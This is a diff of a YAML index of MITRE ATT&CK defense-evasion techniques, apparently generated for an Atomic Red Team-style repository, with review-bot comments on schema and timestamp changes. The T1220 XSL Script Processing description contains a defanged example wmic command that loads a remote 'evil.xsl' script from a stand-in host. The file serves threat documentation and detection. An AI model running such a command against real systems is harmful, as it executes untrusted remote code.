- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12855,7 +13165,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
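Review bot: the `|+` block scalar at `description: |+` keeps every trailing newline, so the blank line that closes the block is part of the value and the T1548.006 description now ends in two newlines, whereas the old double-quoted scalar ended in a single one (`...desired TCC permissions.\n"`). The other block descriptions in this diff (T1220, T1564.001) dump as `|-`, so a keep-chomping indicator here usually means the dumper is preserving a stray trailing newline in the source string rather than deliberate content; check the upstream string before accepting that churn. The new wording itself ("and an overwrites file (if connected to an MDM)", "When System Integrity Protection (SIP) is disabled, TCC protections are also disabled") is upstream ATT&CK text and should stay verbatim.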
@@ -13086,6 +13374,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
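Review bot: dropping `spec_version: '2.1'` here, and from every other technique object in this diff, removes the STIX marker that distinguishes 2.1 content from 2.0, leaving `x_mitre_attack_spec_version` as the only version field. That is a schema change for anything that validates index entries as STIX 2.1 objects, so the PR description should state that `spec_version` is gone on purpose and that consumers must key on `x_mitre_attack_spec_version` instead.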
@@ -13169,7 +13458,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
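Review bot: `modified` for T1055.008 moves backwards, from 2022-04-25T14:00:00.188Z to 2021-10-18T12:26:31.766Z, and the same regression appears for T1027.007 (2022-11-08 to 2022-08-23), T1564.001 (2021-04-29 to 2020-03-29) and T1480.001 (2022-05-24 to 2022-05-04) further down. Every old value ends in `.188Z`, and most share the `14:00:00.188Z` time of day across unrelated dates, which looks like a batch re-stamp rather than a real edit time; if the regeneration now reads the genuine upstream `modified`, say so in the PR description, because a timestamp going backwards otherwise reads as the index having been rebuilt from a stale bundle.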
@@ -13214,8 +13503,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
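Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1055.008 with no replacement in view, unlike T1055.015 below where the key is re-emitted as `3.2.0` at the end of the object. Since `spec_version` is being dropped in the same hunk, confirm that T1055.008 still carries `x_mitre_attack_spec_version` somewhere above this context (the generator does reorder keys), otherwise the entry ends up with no version marker at all.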
@@ -13260,7 +13547,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
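Review bot: nearly all of the T1055.015 delta is key reordering: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and re-emitted further down in a different order. The only content changes are the new `(Citation: Hexacorn Listplanting)` after the first sentence, the `modified` bump to 2024-08-14 and the spec bump to 3.2.0 with `revoked`/`x_mitre_deprecated` added. A fixed key order in the generator would reduce this to a few lines per object and make the real changes reviewable; as written, a reviewer has to reassemble each object to confirm nothing was dropped. Note also the context line `x_mitre_attack_spec_version: 2.1.0` for T1027.007 at the top of this hunk: that object stays on 2.1.0 while T1055.015 moves to 3.2.0, so the file now mixes spec versions.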
@@ -13342,6 +13599,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
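Review bot: the platform list for T1484 replaces `Azure AD` and `SaaS` with the single value `Identity Provider`, and the same rename appears for T1550.001 and T1078.004 below, where `Office 365` and `Google Workspace` become `Office Suite`. Any per-platform index or matrix keyed on the old platform strings will silently lose these techniques, so check that the generator's platform list, and whatever file names derive from it, has been updated for `Identity Provider` and `Office Suite` in this same PR. Also note that `SaaS` is dropped outright for T1484 rather than kept alongside the new value as it is for T1550.001 and T1078.004; verify that matches upstream rather than a mapping gap.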
@@ -13474,8 +13764,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -13552,29 +13796,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
@@ -13607,7 +13895,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -13635,48 +13923,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13685,6 +13936,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13693,20 +13947,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
